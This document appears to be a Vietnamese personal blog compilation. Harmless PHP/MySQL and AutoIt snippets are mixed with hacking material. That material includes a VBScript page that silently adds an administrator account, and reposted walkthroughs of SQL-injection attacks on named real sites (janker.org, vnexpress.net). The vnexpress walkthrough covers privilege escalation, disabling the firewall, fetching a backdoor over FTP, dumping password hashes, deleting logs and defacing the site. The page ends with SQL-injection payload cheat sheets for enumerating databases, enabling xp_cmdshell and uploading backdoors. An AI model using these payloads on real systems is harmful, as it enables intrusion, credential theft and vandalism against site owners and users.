Dùng php và sql để lưu địa chỉ web
Thêm địa chỉ:[?php
include("info.php");
$link = mysql_connect('localhost', $mysql_user, $mysql_password);
if (!$link) {
die('Could not connect: ' . mysql_error());
}
echo 'Connected successfully [br]';
$link_db = mysql_select_db($db, $link);
$sql = "INSERT INTO `url` (`id`, `des`, `url`) VALUES ('1', 'search', 'http://yahoo.com');";
$result = mysql_query($sql);
if (!$result)
{
die(mysql_error());
}
mysql_close($link);
?]
Hiển thị nội dung trong cơ sở dữ liệu:[?php
include("info.php");
$link = mysql_connect('localhost', $mysql_user, $mysql_password);
if (!$link) {
die('Could not connect: ' . mysql_error());
}
echo 'Connected successfully [br]';
$link_db = mysql_select_db($db, $link);
$sql = "SELECT * FROM `url`;";
$result = mysql_query($sql);
if (!$result)
{
die(mysql_error());
}
echo "[table border=1 cellspacing=0 ][tr bgcolor=aaffee ][td]ID[/td][td]Des[/td][td]Url[/td][/tr]";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
printf("[tr][td] %s [/td][td] %s [/td][td] [a href=\"%s\"]%s[/a][/td][/tr]", $row[0], $row[1],$row[2],$row[2]);
}
mysql_free_result($result);
echo "[/table]";
mysql_close($link);
?]
Tạo bảng mới:$sql = "CREATE TABLE `vidu1` (`id` VARCHAR(10) CHARACTER SET ascii COLLATE ascii_bin DEFAULT '0' NOT NULL, PRIMARY KEY (`id`));";
hayCREATE TABLE `url` (
`id` INT(10) NOT NULL,
`des` VARCHAR(100) NOT NULL,
`url` VARCHAR(100) NOT NULL,
PRIMARY KEY (`id`)
);
Thêm mẫu tin:INSERT INTO `url` (`id`, `des`, `url`) VALUES ('0', 'search', 'http://google.com');
Tạo user bằng web
[html]
[object id=wsh
classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B][/object]
[script language=vbscript]
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user NEW_USER fuckbiatch /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators NEW_USER /add",0)
window.close
[/script]
[/html]
Small PC Dictionary
English | Chinese | Italian | French |
remember sign hack hacker crack cracker tool virus download upload logout hacking software trojan free security hole share access deny game attack service scan port trace host mail data database login code source file edit view shell | 记得 登录 哈克 黑客 裂缝 裂解装置 工具 病毒 下载 上传 登出 黑客 软件 木马 免费 安全 孔 分享 进入 否认 游戏 攻击 服务 扫描 港口 痕量 东道国 邮件 数据 数据库 登录 代码 源 档案 编辑 鉴于 壳牌 | Ricordo Segno Hack Hacker Crack Cracker Strumento Virus Download Caricare Logout Hacking Software Trojan Libero Sicurezza Buco Parti Accesso Negare Gioco Attacco Servizio Scansione Port Traccia Host Mail Dati Database Login Codice Fonte File Modifica Vista Shell | Se souvenir Signe Hack Hacker Fissure Cracker Outil Virus Télécharger Upload Logout Hacking Logiciel Cheval de Troie Gratuit Sécurité Trou Part Accès Nier Jeu Attaque Service Scan Port Trace Accueil Mail Données Base de données Login Code Source Fichier Modifier Vue Shell |
Nhãn: dictionary
Autoit code
While (99999)
BlockInput (1)
$var = String(20)
$url = "http://www.game.com/index.html"
BlockInput (0)
WinMinimizeAll()
Sleep(1)
WEnd
; ; AutoIt Version: 3.0 ; Language: English ; Platform: Win9x/NT ; Author: Jonathan Bennett (jon at hiddensoft com) ; ; Script Function: ; Counts to 5 using a "for" loop ; Prompt the user to run the script - use a Yes/No prompt (4 - see help file) $answer = MsgBox(4, "AutoIt Example", "This script will count to 5 using a 'For' loop. Run?") ; Check the user's answer to the prompt (see the help file for MsgBox return values) ; If "No" was clicked (7) then exit the script If $answer = 7 Then MsgBox(0, "AutoIt Example", "OK. Bye!") Exit EndIf ; Execute the loop 5 times For $count = 1 To 5 ; Print the count MsgBox(0, "AutoIt Example", "Count is: " & $count) Next ; Finished! MsgBox(0, "AutoIt Example", "Finished!")
Autoit script
Example1
; AutoIt Version: 3.0
; Language: English
; Platform: Win9x/NT
; Author: Jonathan Bennett (jon@hiddensoft.com)
;
; Script Function:
; Plays with the calculator.
;
; Prompt the user to run the script - use a Yes/No prompt (4 - see help file)$answer = MsgBox(4, "AutoIt Example (English Only)", "This script will run the calculator and type in 2 x 4 x 8 x 16 and then quit. Run?"); Check the user's answer to the prompt (see the help file for MsgBox return values)
; If "No" was clicked (7) then exit the scriptIf $answer = 7 Then
MsgBox(0, "AutoIt", "OK. Bye!")
Exit
EndIf; Run the calculatorRun("calc.exe"); Wait for the calulator become active - it is titled "Calculator" on English systemsWinWaitActive("Calculator"); Now that the calc window is active type 2 x 4 x 8 x 16
; Use AutoItSetOption to slow down the typing speed so we can see it :)AutoItSetOption("SendKeyDelay", 400)
Send("2*4*8*16=")
Sleep(2000)
; Now quit by sending a "close" request to the calcWinClose("Calculator"); Now wait for calc to close before continuingWinWaitClose("Calculator"); Finished!
Example2
; AutoIt Version: 3.0
; Language: English
; Platform: Win9x/NT
; Author: Jonathan Bennett (jon at hiddensoft com)
;
; Script Function:
; Counts to 5 using a "do" loop
; Prompt the user to run the script - use a Yes/No prompt (4 - see help file) $answer = MsgBox(4, "AutoIt Example", "This script will count to 5 using a 'Do' loop. Run?") ; Check the user's answer to the prompt (see the help file for MsgBox return values)
; If "No" was clicked (7) then exit the script If $answer = 7 Then
MsgBox(0, "AutoIt Example", "OK. Bye!")
Exit
EndIf
; Set the counter $count = 1 ; Execute the loop "until" the counter is greater than 5 Do ; Print the count MsgBox(0, "AutoIt Example", "Count is: " & $count) ; Increase the count by one $count = $count + 1 Until $count > 5 ; Finished! MsgBox(0, "AutoIt Example", "Finished!")
Run application by ActiveX <object classid="clsid:42B1C70D-9823-41f7-810A-682DA294D868" codebase="C:Program FilesK-Lite Codec PackMedia Player Classicmplayerc.exe"></object>
Yahoo Messenger Chat nhieu nick Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERSoftwareyahoopagerTest]
"Plural"=dword:00000001
Thay đổi độ rộng của blogger
#outer-wrapper {
width: 1000px;
margin:0 auto;
padding:10px;
text-align:$startSide;
font: $bodyfont;
}
#main-wrapper {
width: 600px;
float: $startSide;
word-wrap: break-word; /* fix for long text breaking sidebar float in IE */
overflow: hidden; /* fix for long non-text content breaking IE sidebar float */
}
#sidebar-wrapper {
width: 350px;
float: $endSide;
word-wrap: break-word; /* fix for long text breaking sidebar float in IE */
overflow: hidden; /* fix for long non-text content breaking IE sidebar float */
}
Thu phục www.janker.org
Nguồn: HVA
Lời nói đầu : Không hiểu sao có rất nhiệu bạn rất khoái hỏi vền hack web...nhưng......các bạn nên hiểu...hack pass....xâm nhập máy tính thì may ra có thể hướng dẫn...chứ hack web thì...tớ không biết nói thế nào nữa....càng không biết mình nên post bài thế nào..tuy vây..nhưng vì yêu cầu của các bạn bè..tớ xin post lại quá trình khi hack được một trang cho các bồ tham khao..nhưng có lã là không chi tiết cho lăm..quan trọng là các bạn có kiến thức chút it về nó..thế thì sẽ rất dễ hiểu là tớ muốn nói gì....... ok ! mục tiêu của tui là www.janker.org
lấy trình Scan ra...quét một vòng cái ccoi.....chắc là kết quả mất bồ cũng đáon được rồi nhỉ ? thế thì không tào lao nửa...dù seo thí post 23 & 80 đã open rồi...kết quả này phải nhớ. nếu không có lổ hổng hế thống...có các sự lựa chọn sau : 1.Premeate ; 2 lổ hổng...đương nhiên...còn có thể chơi D.D.o.S và còn nhiều kiểu chơi khắc nửa...nhưng hình như là chúng ta đi qua xa rôi...thôi..ngôi yên để làm việc đi......
kiếm...kiếm ...kiếm...sau mấy giây...phát hiện là có một chổ không có sừ lý tốt đẹp tham số ID.
http://www.janker.org/show.asp?id=2;--
Error rồi . `` Microosft JET Databest Engine Error ` 80040e14`.....đàng sau câu SQL kiếm được chử. ``
uh ! chắc là quý vị đã phát hiện rồi nhỉ ? tui nghỉ là ngử pháp này nói cho chúng ta biết 2 điều :
1. sử dụng Access ; 2 ...trong cái đó có cái gì rất đặt biệt `` whare id=`` & request ( ``id``) chưa được fix khỏi hệ thống.
nhưng quan trọng là chơi thế nào đây....?
tui vân quyết định là coi thêm chút chút nửa...sau khi đoán mò một lúc...thấy là nó sẽ có một cái hết thống quản lý....đoán tiếp xem..
http://www.janker.org/show.asp?id=2 or id in ( select id from admin )
ok ! good ! không có báo Error...thế thì nó tồn tại một biểu Admin...còn nửa..trong biểu này còn có Hàng ID. thật ra thì sau này tui nghỉ qua nghỉ lại...thế náy không có tốt...( không muốn nói lý do...sorry )
đoán mò tiếp....xong rrồi...uh..ra kết quả User , Password. tới đây..tui lại cám thấy mình chạy qua chạy lái rất nhiều đường vòng...tuy là trực giác đây là một mã nguồn miễn phí..nhưng tại vì nhất thời tui chưa nhận ra là cái gì..nên không có download về phấn tích...bây giờ thì đoán muốn chết xủi..thấy là tốtt nhất vẫn là đi kiếm download các mã nguồn .....
thế là phương hướng hack của tui lại biến tiếp..( chén wé )...ok ! Google đâu rồi ? Search từ kháo fir.asp , vì fir.asp là một chử rất kỳ cục..thế là tui Search được rất nhiều cái giông nhau...trong tất cả các link....chắc chắn là sẽ có rất it nhiều có thế hack dễ dàng..tui sử dụng webdavx3, đại khái là sau khi thất bại 60 lần..(huhu) cuối cùng cũng tiềm đuợc một cài rồi...tất nhiên..mục đích bước này của tui chẳng qua là muốn biết các code thôi ( đừng có tưởng lá tui chuyển mục tiêu để quậy nghe ) chứ không có ý gì khác..chỉ là setup socks5 trên hệ thống này thôi..(hêhê )
sau khi lấp xong lổ hổng là tui logout......
giờ này đã rần 2 giờ sáng rồi..tới quyết định không chơi Net nửa...mà ngồi đó coi code...uh..nói đúng hơn là cói cơ sở dữ liệu access..nếu biết thế sớm thì đã tóm được bao nhiều thời gian rồi...
chắc là sẽ có ngừơi tính download trức tiếp các Database ? hêhê..đâu có dễ thế .....tên của Database 120% là đã đổi rồi....
um...tớ đã có được biểu admin rồi...việc đoán passwords không phải là chuyện quá khó..nhưng hiện nay quan trọng vẫn là coi trong đó có tất cả bao nhiêu Administrator
http://www.janker.org/show.asp?id=3 AND 1
Thỏa hiệp vnexpress
Nguồn: http://goctinhoc.com
Đây là từng buớc mà mình đã làm để thỏa hiệp website http://vnexpress.net.
để an toàn khi hack, mình set lại proxy trong IE5 là proxy.ia2.marketscore.com:80.
Xong, bây giờ bắt đầu vào http://vnexpress.net. Loay hoay
một chặp trên VnExpress để tìm lỗi SQL Injection, mục Rao Vặt: http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3` HTTP 500.100 - Internal Server Error - ASP error Internet Information Services Error Type: Unclosed quotation mark before the character string `` /User/Rao-vat/Source/Detail.Asp, line 114 Yeah! Mình thử dùng các kí tự khác ngoài dấu `: `` , ( ) để biết được chính xác URL khai thác: http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) ... Bây giờ đến việc tiến hành xâm nhập vào máy chủ này qua lỗi SQL Injection! - Đầu tiên mình xác định xem phiên bản của MSSQL và Windows NT: http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,@@version)--sp_password Syntax error converting the nvarchar value `Microsoft SQL Server 2000 - 8.00.655 (Intel X86) Jul 3 2002 18:10:57 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114 (Để tránh ghi nhật kí trong MSSQL, mình thêm sp_password vào sau --. Khi MSSSQL phát hiện ra chuổi `sp_password` trong câu lệnh SQL, nó sẽ ghi nhật kí như sau: -- `sp_password` was found in the text of this event. -- The text has been replaced with this comment for security reasons.. Để cho đơn giản, từ đây mình sẽ ghi tắc --sp_password là -- nha) + SQL 2000 8.00.655 03/07/2002 + Windows 2000 5.0 Build 2196 SP3 - Mình xác định tiếp tên người dùng hiện tại và tên CSDL đang làm việc: http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,system_user)-- Syntax error converting the nvarchar value `IUSR_WIN10814` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114 http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,db_name())-- Syntax error converting the nvarchar value `Infostore` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114 Username hiện tại không phải là sa hoặc BUILTINAdministrators nên không thể xài master..xp_cmdshell. SQL ngày 03/07/2002, đang chạy với Windows Authentication user là IUSR_WIN10814, hơi cũ so với ngày hiện tại. Mình vào trang http://www.securiteam.com và search các lỗi của MSSQL đã được công bố sau ngày 03/07/2002. Đây là thứ mà mình tìm: NGSSoftware Insight Security Research Advisory Name: Extended Stored Procedure Privilege Upgrade Systems: Microsoft SQL Server 2000 and 7 Severity: High Risk Category: Privilege Escalation Vendor URL: http://www.microsoft.com/
Author: David Litchfield ( david@ngssoftware.com Địa chỉ email này đang được bảo vệ khỏi chương trình thư rác, bạn cần bật Javascript để xem nó ) Advisory URL: http://www.ngssoftware.com/advisories/mssql-esppu.txt
Date: 15th August 2002 Advisory number: #NISR15002002A Description *********** Microsoft SQL Server 2000 and 7 extends functionality by using extended stored procedures. Three particular extended stored procedures contain a vulnerability that allow a low privileged user to run abritrary SQL queries in the context of the account running SQL Server. Details ******* SQL Server supports two forms of authentication. The first is where a user uses an SQL login and password to authenticate and the second is through Windows Authentication. Any user authenticated by Windows can ``upgrade`` their privileges to that of the account running the SQL Server by using one of three extended stored procedures. These stored procedures allow a user to run an arbitrary SQL query. By exploiting this problem a low privileged user will be able to run any stored procedure, extended or otherwise, and select from, update or insert into any table in any database. That is by exploiting these holes an attacker can fully compromise the database server and its data. Whilst an SQL Login user can not directly exploit this vulnerability they can do so indirectly by submitting a job to the SQL Agent. As this the SQL Agent authenticates to the SQL Server and runs in the context of Windows account these vulnerabilities can be exploited. Please see NGSSoftware alert NISR15002002A (http://www.ngssoftware.com/advisories/mssql-esppu.txt) for more details. Fix Information *************** NGSSoftware informed Microsoft of these issues in July. Microsoft has produced a patch that resolves these issues. Please see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/ bulletin/MS02-043.asp for more details. For those SQL Server database administrators who are not able to patch immediately NGSSoftware recommend that they remove public access to these stored procedures. This will prevent low privileged users from accessing these extended stored procedures. xp_execresultset xp_printstatements xp_displayparamstmt A check for this vulnerability has been added to Typhon II, NGSSoftware`s vulnerability assessment scanner, of which, more information is available from the NGSSite, http://www.ngssoftware.com/.
Username hiện tại là IUSR_WIN10814, thuộc loại Windows Authentication nên chúng ta có thể dùng xp_displayparamstmt để nâng quyền của username này lên dbo. http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_displayparamstmt N`sp_addsrvrolemember ``IUSR_WIN10814``,``sysadmin```,N`master`,1-- Mình add user IUSR_WIN10814 vào n hóm sysadmin để có thể dùng được master..xp_cmdshell Xác định lại username hiện tại xem sao? http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3 ) and 1=convert(int,user_name())-- Syntax error converting the nvarchar value `dbo` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114 DBO - Chúng ta đang có quyền hạn cao nhất trên máy chủ MSSQL đó nha. Tiếp theo mình xác định địa chỉ IP của máy chủ này như sau: Đầu tiên tạo một bảng chứa dữ liệu và đổ kết quả của lệnh exec master..xp_cmdshell `ipconfig` vào bảng này. http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);create table systables(a int identity,b varchar(1000)) insert into systables exec master..xp_cmdshell `ipconfig`-- Việc còn lại là lấy kết quả từ bảng systables: http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,(select top 1 b from systables where b like `%25IP Address%25`))-- (%25 == ``%``) Syntax error converting the nvarchar value ` IP Address. . . . . . . . . . . . : 10.244.63.231 ` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114 http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,(select b from systables where b like `%25IP Address%25`) and b not in(`%2510.244.63.231%25`))-- Syntax error converting the nvarchar value ` IP Address. . . . . . . . . . . . : 198.64.129.137 ` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114 http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,(select b from systables where b like `%25IP Address%25`) and b not in(`%2510.244.63.231%25`,`%25198.64.129.137%25`))-- Syntax error converting the nvarchar value ` IP Address. . . . . . . . . . . . : 198.64.132.21 ` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114 http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,(select b from systables where b like `%25IP Address%25`) and b not in(`%2510.244.63.231%25`,`%25198.64.132.21%25`,`%25198.64.129.137%25`,`%25198.64.132.21%25`))-- Syntax error converting the nvarchar value ` IP Address. . . . . . . . . . . . : 198.64.132. 22` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114 Hì hì, nó có đến 4 địa chỉ IP luôn! Mình thử ping đến vnexpress.net để xem thử địa chỉ IP của Web Server ra sao? C: > ping vnpress.net Pinging vnexpress.net [198.64.132.22] with 32 bytes of data: Reply from 198.64.132.22: bytes=32 time=344ms TTL=105 Control-C Như vậy IIS và MSSQL đều được cài trên cùng một máy chủ. Thử nối đến cổng cổng 1433 bằng Netcat xem sao? C: > nc -vv -n 198.64.132.22 1433 (UNKNOWN) [198.64.132.22] 1433 (?): connection refused sent 0, rcvd 0: NOTSOCK VnExpress.NET đã đặt tường lửa cho cổng 1433 rồi. Mình nghĩ khả năng lớn nhất là họ đã dùng tường lửa lọc cổng dữ liệu đi kèm với Windows 2000 Server. Mình quyết định phá tường lửa này. http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_regdeletevalue `HKEY_LOCAL_MACHINE`, `SYSTEMCurrentControlSetServicesTcpipParameters`,`EnableSecurityFilters`--
Chỉ cần del giá trị EnableSecurityFilters trong khóa HKLMSYSTEMCurrentControlSetServicesTcpipParameters là xong.
Nối lại xem sao?
C: > nc -vv -n 198.64.132.22 1433
(UNKNOWN) [198.64.132.22] 1433 (?) open
Đúng y như mình đã dự đoán!
Bây giờ đến việc upload backdoor và một vài đồ nghề khác lên server.
Mình chuẩn bị sẵn mấy thứ này trong thư mục /vnexpress trên máy chủ FTP free-hosting.
Bởi vì việc lấy các file trên FTP hơi lâu nên nếu dùng IE5 thì kết sẽ bị ngắt nữa chừng
do lỗi timeout (đang xài kết nối quay số ở ngoài dịch vụ mà) nên mình chuyển sang xài
Mini-Browser (*Mini-Browser là một đồ nghề không thể thiếu được khi hack web).
Set lại proxy cho Mini-Browser là proxy.ia2.marketscore.com:80 cho chắc.
http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_cmdshell `echo open ftp.esmartweb.com > f & echo user username xxxxx > > f & echo bin > > f & echo cd /vnexpress > > f & echo mget * > > f & echo quit > > f & ftp -v -i -n -s:f`--
URLEncode - > http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);
exec%20master..xp_cmdshell%20`echo%20open%20ftp.esmartweb.com
%20%3Ef%20%26%20echo%20user%20username%20xxxxx%20%3E%3Ef
%20%26%20echo%20bin%20%3E%3Ef%20%26%20echo%20cd%20/vnexpress
%20%3E%3Ef%20%26%20echo%20mget%20*%20%3E%3Ef%20%26%20
echo%20quit%20%3E%3Ef%20%26%20ftp%20-v%20-i%20-n%20-s%3Af`--
[GET]
Waiting...!
Done.
Kích hoạt backdoor WinShell 4.0:
http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_cmdshell `backup`--
Xong, bây giờ chỉ việc kết nối đến backdoor WinShell. Mình dùng Putty để nối
+ Host Name (or IP Address): 198.64.132.22
+ Port: 3371
+ Protocol: (o) Raw
xxxxx
WinShell v4.0
(C)2001 by janker
http://www.bugsos.com
? for help
CMD > s
C:WINNTsystem32 > _
- Đổ SAM
Administrator:500:C3591A674B80231AF24E41BBADB86F3F:B0F92BB2E3471150BEC31733D67288EA:Built-in account for administering the computer/domain::
Guest:501:********************************:********************************:Built-in account for guest access to the computer/domain::
TsInternetUser:1000:DFA15ABF9536AE19F7FF965C044A5116:D21C509DA73030AD8DA1014F3A211943:TsInternetUser,This user account is used by Terminal Services.::
IUSR_WIN10814:1001:9C0887DCB5F1EA859B0B497A5C75047F:A9438645CA94E67F631C2E14E1CDF7D4:Internet Guest Account,Built-in account for anonymous access to Internet Information Services::
IWAM_WIN10814:1002:A4BE543712EDBA21B0991B757487A81E:BCE493DFA35602091F9285CAEABA3128:Launch IIS Process Account,Built-in account for Internet Information Services to start out of process applications::
Internet:1003:336F31071CA2B4A0D14C9408F0C70C13:80C82BA8E876F8D59732AC429A93072B:Internet,FPT Internet admin access::
vReplicator:1004:578BFE097611D01A73545BB507664033:AF30E872418F24EC3FD86F58CB8F0DFD:Replicate Site::
AdminEditor:1005:A07C0994B7D99B918284770D91848144:121CF5A2FB538FC2EF4918C69EC29116:Admin Editor::
Thangpv:1006:F138C587F87CB06E29B1F66481A851EE:7AA75649EA242FE1FD76191279F2F407:Pham Vinh Thang::
- Xác định WWROOT của IIS
C:WINNTsystem32 > reg query ``hklmsystemcurrentcontrolsetservicesw3svcparametersvirtual roots``
! REG.EXE VERSION 2.0
HKEY_LOCAL_MACHINEsystemcurrentcontrolsetservicesw3svcparametersvirtual roots
/ REG_SZ D:InfostoreMaster,,201
/IISHelp REG_SZ C:WINNTHelpiisHelp,,201
/Replicate REG_SZ D:InfoStoreReplicate,,201
- Xóa nhật kí của IIS (thật sự thì mình không hề bị ghi nhật kí vì Admin của VnExpress.NET đã disable log của IIS do số lượng người truy cập vào trang web này quá đông)
C:WINNTsystem32 > reg query hklmsystemcurrentcontrolsetservicesw3svcparameters /v logfiledirectory
! REG.EXE VERSION 2.0
HKEY_LOCAL_MACHINEsystemcurrentcontrolsetservicesw3svcparameters
logfiledirectory REG_SZ C:WINNTSystem32LogFiles
C:WINNTsystem32 >
C:WINNTsystem32 > dir %systemroot%system32logfiles
Volume in drive C has no label.
Volume Serial Number is 5C62-FB1E
Directory of C:WINNTsystem32logfiles
04/19/2002 12:26a
. 04/19/2002 12:26a .. 04/19/2002 07:24a W3SVC1 0 File(s) 0 bytes C:WINNTsystem32 > rd /s /q logfilesw3svc1 - Để xem có gì trong WWROOT không? D:InfoStore > dir Volume in drive D is InfoStore Volume Serial Number is 544E-1C8D Directory of D:InfoStore 04/25/2002 08:39a . 04/25/2002 08:39a .. 04/19/2002 10:44a ftproot 09/20/2002 03:29p Master 10/01/2002 01:10p Replicate 0 File(s) 0 bytes 5 Dir(s) 46,340,067,328 bytes free Cả khối file tin tức trong thư mục Master. Mình thấy chỉ có Replicate và một số ít các file trong Master là còn có giá trị nên download về. C:WINNTsystem32 > rar -a f.zip d:infostore eplicate*.* C:WINNTsystem32 > copy /y f.zip d:infostoremaster eadme.txt (dùng Mass Downloader để download file http://vnexpress.net/readme.txt về) C:WINNTsystem32 > del d:infostoremaster eadme.txt ... và một số việc khác nữa không kể ra ở đây tới. *Server của VnExpress.NET chẳng có thứ gì ngoài mấy cái tin tức cung cấp miễn phí cho mọi người nên mình quyết định stop tại đây, không xóa bất kì file n ào trên server đâu nha. Mình chỉ upload vài file để deface trang VnExpress.NET cho vui thôi. - À nếu bạn cần cài backdoor/rootkit không bị phát hiện trên Windows NT thì dùng Hacker Defender (http://rootkit.host.sk) hoặc TYT ( http://www.polarhome.com/~vickit/tyt0/ , mã nguồn: http://www.polarhome.com/~vicki/hack/congcu/win/tyt0-src.zip) của mình nha. * Hiện tại bản Hacker Defender 0.7.3 không làm việc trên Windows 2000 bản Enterprise. Mình đã test thử trên vài server rồi, trong khi backdoor của mình thì vẫn làm việc tốt đối với bản Enterprise. Khi nào có source-code của HxDef mình sẽ phát triển tiếp con backdoor của mình để cho các bạn xài. Nói thật là mấy thứ backdoor và rootkit này cũng rất dễ bị phát hiện và disable. Hì hì, không nói ở đây nha (để cho an toàn thôi)
sql inject và php inject
or 1=1 and 1=convert(int,db_name())--sp_password
or 1=1 and 1=convert(int,system_user)--sp_password
or 1=1 and 1=convert(int,@@version)--sp_password
or 1=1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--sp_password
or 1=1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('REFERENTIAL_CONSTRAINTS')--sp_password
or 1=1 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='REFERENTIAL_CONSTRAINTS'--sp_password
[LINK].php?site=bantin&id=-1 union select from 0 admin/*
[LINK].php?site=bantin&id=-1 union select from 0 where admin*/
[LINK].php?site=bantin&id=-1 union select from 0,1 admin/*
.....................
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10 admin/*
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10,11 admin/*
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10,11,12 admin/*
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10,11,12,13 admin/*
[LINK].php?site=bantin&id=-1+union+select+0,1,2,concat(user,char(32),pass),4,5,6,7,8,9,10,11,12,13+from+admin/*
Tiêu đề: SQL - Injection cơ bản và nâng cao
Nguồn: HVA
A. Khai thac thong tin ve SQL server
1. Khai thac thong tin ve MS SQL server
' Thông tin về version của MS SQL
and 1=@@version--sp_password
'Thông tin về servername
and 1=@@servername--sp_password
'Thông tin về SERVICENAME
and 1=@@SERVICENAME--sp_password
'Thông tin về UID
and 1=system_user--sp_password
'Thông tin về PWD
?
2. Khai thac thong tin ve Database
'Thông tin về tên database
and 1=db_name()--sp_password
3. Khai thac thong tin ve Table
'Khai thác thông tin về Table
having 1=1--sp_password
'Khai thác thông tin về các Table
group by QUESTIONS.QUEST_ID having 1=1--sp_password
'Khai thác thông tin về Table
UNION SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES--sp_password
'Khai thác thông tin về các Table
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE
TABLE_NAME NOT IN ('PRODUCTS')--sp_password
'Khai thác thông tin về Table
and 38=convert(int,(select top 1 table_name from
information_schema.tables))--sp_password
'Khai thác thông tin về các Table
and 38=convert(int,(select top 1 table_name from
information_schema.tables
where table_name not in ('PRODUCTS')))--sp_password
4. Khai thac thong tin ve Column
'Khai thác thông tin về Column
and 38=convert(int,(select top 1 column_name from
information_schema.columns where
table_name=('QUESTIONS')))--sp_password
'Khai thác thông tin về các Column
and 38=convert(int,(select top 1 column_name from
information_schema.columns where table_name=('QUESTIONS') and
column_name
not in ('QUEST_ID')))--sp_password
5. Khai thac thong tin ve Content
'Khai thác thông tin với kiểu ngày giờ
and 1=convert(char(20),(select top 1 NgayXuat from
PhieuXuat))--sp_password
'Khai thác thông tin dòng tiếp theo với kiểu ngày giờ
and 1=convert(char(20),(select top 1 NgayXuat from PhieuXuat where
NgayXuat<>'Mar 12 2003 12:00AM '))--sp_password
'Khai thác thông tin về dòng đầu tiên
and 1=convert(int,(select top 1 userName+'/'+userPass from
Users))--sp_password
'Khai thác thông tin dòng tiếp theo
and 1=convert(int,(select top 1 userName+'/'+userPass from Users where
userName not in('admin')))--sp_password
6. Khai thac thong tin ve Table, Column, Content cua cac database tiep
Chú ý:
để nhận biết kiểu của cột
dữ liệu ta dùng "image" để kiểm tra:
-Nếu là trường kiểu ngày/giờ
Dùng: char,nchar,nvarchar,varchar
B. Upload backdoor lên host
1. Xác định mức quyền và cho phép thực thilệnh của MS SQL server
'Xác định mức quyền
;select * from openrowset('sqloledb','';;,'')--
'Thay đổi mức quyền
;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1--
;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0--
'Xoá bỏ và khôi phục Log và firewall trong MS SQL
;exec master..xp_regdeletevalue
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'--
;exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters',REG_DWORD,0--
'Cho phép sử dụng MASTER..XP_CMDSHELL & ALLOW UPDATES
;select * from openrowset('sqloledb',
'server=Digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec
sp_configure
''allow updates'', ''1'' reconfigure with override')--
2. Do thám đưa thêm các thông tin
'Do tham IP của server và đưa vào bảng testip
;drop table testip create table testip(stt int identity,dcip
varchar(1000)) insert into testip exec master..xp_cmdshell 'ipconfig'--
'Cộng thêm một quyền quản trị mới
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a
/add"')-- (%26 == "&")
3. Đưa backdoor lên server'Upload backdoor lên server vào thư mục C:\WINDOWS\system32
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..xp_cmdshell "chube >>runfile.txt"')--
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
